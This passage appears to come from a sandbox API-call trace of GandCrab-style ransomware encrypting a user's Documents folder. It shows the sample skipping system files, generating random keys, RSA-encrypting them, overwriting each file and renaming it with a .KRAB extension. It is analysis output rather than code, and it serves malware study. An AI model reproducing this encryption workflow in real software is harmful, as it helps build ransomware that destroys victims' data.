flProtect=0x4) returned 0x2f30000 [0091.057] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt.KRAB") returned 93 [0091.057] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt") returned 88 [0091.057] lstrlenW (lpString=".ppt") returned 4 [0091.057] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.057] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ppt ") returned 5 [0091.057] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt") returned 88 [0091.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt") returned 88 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="desktop.ini") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="autorun.inf") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="ntuser.dat") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="iconcache.db") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="bootsect.bak") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="boot.ini") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="ntuser.dat.log") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="thumbs.db") returned -1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="ntldr") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="NTDETECT.COM") returned 1 [0091.058] lstrcmpiW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="Bootfont.bin") returned 1 [0091.058] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.059] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011018) returned 1 [0091.060] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.061] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.061] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.061] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0091.061] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0091.061] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.062] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0091.063] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.064] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.064] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.064] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0091.064] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.064] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.064] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010bd8) returned 1 [0091.066] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0091.066] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0091.066] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0091.066] GetLastError () returned 0x0 [0091.066] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.066] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0091.066] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0091.068] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0091.068] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0091.068] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0091.068] GetLastError () returned 0x0 [0091.068] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0091.068] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0091.068] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\ouut25ixsleinwnp.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0091.069] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.069] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.071] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xa250, lpOverlapped=0x0) returned 1 [0091.089] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff5db0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.089] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa250, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xa250, lpOverlapped=0x0) returned 1 [0091.089] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0091.089] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.096] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.096] CloseHandle (hObject=0x43c) returned 1 [0091.096] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.097] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\ouut25ixsleinwnp.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\ouut25ixsleinwnp.ppt.krab")) returned 1 [0091.097] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.098] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0091.098] FindClose (in: hFindFile=0xfbd2a0 | out: hFindFile=0xfbd2a0) returned 1 [0091.098] CloseHandle (hObject=0x734) returned 1 [0091.098] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0091.098] FindClose (in: hFindFile=0x1022ff8 | out: hFindFile=0x1022ff8) returned 1 [0091.098] CloseHandle (hObject=0x3a8) returned 1 [0091.098] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.098] lstrcmpW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2=".") returned 1 [0091.098] lstrcmpW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="..") returned 1 [0091.098] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="yt2j6UPuTF1IxF8YRCC.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt" [0091.098] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.099] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt.KRAB") returned 81 [0091.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt") returned 76 [0091.099] lstrlenW (lpString=".odt") returned 4 [0091.099] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.099] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".odt ") returned 5 [0091.099] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt") returned 76 [0091.099] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt") returned 76 [0091.099] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="desktop.ini") returned 1 [0091.099] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="autorun.inf") returned 1 [0091.099] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="ntuser.dat") returned 1 [0091.099] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="iconcache.db") returned 1 [0091.099] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="bootsect.bak") returned 1 [0091.099] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="boot.ini") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="ntuser.dat.log") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="thumbs.db") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="ntldr") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="NTDETECT.COM") returned 1 [0091.100] lstrcmpiW (lpString1="yt2j6UPuTF1IxF8YRCC.odt", lpString2="Bootfont.bin") returned 1 [0091.100] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.100] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010bd8) returned 1 [0091.103] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.103] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.103] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.104] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0091.104] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0091.104] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.104] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0091.104] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.105] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.105] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.105] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0091.106] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.106] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.106] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010bd8) returned 1 [0091.107] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd560) returned 1 [0091.107] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0091.107] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0091.107] GetLastError () returned 0x0 [0091.107] CryptDestroyKey (hKey=0xfbd560) returned 1 [0091.107] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0091.107] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0091.107] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd920) returned 1 [0091.108] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0091.108] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0091.108] GetLastError () returned 0x0 [0091.108] CryptDestroyKey (hKey=0xfbd920) returned 1 [0091.108] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.108] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\yt2j6uputf1ixf8yrcc.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0091.109] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.110] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.110] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x296f, lpOverlapped=0x0) returned 1 [0091.125] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffd691, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.125] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x296f, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x296f, lpOverlapped=0x0) returned 1 [0091.125] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0091.125] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.136] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.136] CloseHandle (hObject=0x3a8) returned 1 [0091.137] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.137] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\yt2j6uputf1ixf8yrcc.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\yt2j6UPuTF1IxF8YRCC.odt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\yt2j6uputf1ixf8yrcc.odt.krab")) returned 1 [0091.138] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.138] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0091.138] FindClose (in: hFindFile=0x1023378 | out: hFindFile=0x1023378) returned 1 [0091.138] CloseHandle (hObject=0x434) returned 1 [0091.138] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.138] lstrcmpW (lpString1="HhPD9.rtf", lpString2=".") returned 1 [0091.138] lstrcmpW (lpString1="HhPD9.rtf", lpString2="..") returned 1 [0091.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="HhPD9.rtf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf" [0091.138] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.138] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf.KRAB") returned 46 [0091.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf") returned 41 [0091.139] lstrlenW (lpString=".rtf") returned 4 [0091.139] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.139] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".rtf ") returned 5 [0091.139] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf") returned 41 [0091.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf") returned 41 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="desktop.ini") returned 1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="autorun.inf") returned 1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="ntuser.dat") returned -1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="iconcache.db") returned -1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="bootsect.bak") returned 1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="boot.ini") returned 1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="ntuser.dat.log") returned -1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="thumbs.db") returned -1 [0091.139] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="KRAB-DECRYPT.html") returned -1 [0091.140] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.140] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.140] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="ntldr") returned -1 [0091.140] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="NTDETECT.COM") returned -1 [0091.140] lstrcmpiW (lpString1="HhPD9.rtf", lpString2="Bootfont.bin") returned 1 [0091.140] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.140] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010bd8) returned 1 [0091.140] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.141] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.141] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.141] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.141] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0091.141] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.141] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0091.142] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.142] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.143] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.143] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.143] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.143] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.143] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10111b0) returned 1 [0091.143] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd5a0) returned 1 [0091.144] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.144] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.144] GetLastError () returned 0x0 [0091.144] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0091.144] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0091.144] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010930) returned 1 [0091.144] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd560) returned 1 [0091.144] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.144] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.145] GetLastError () returned 0x0 [0091.145] CryptDestroyKey (hKey=0xfbd560) returned 1 [0091.145] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0091.145] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\hhpd9.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.145] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.146] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.147] ReadFile (in: hFile=0x434, 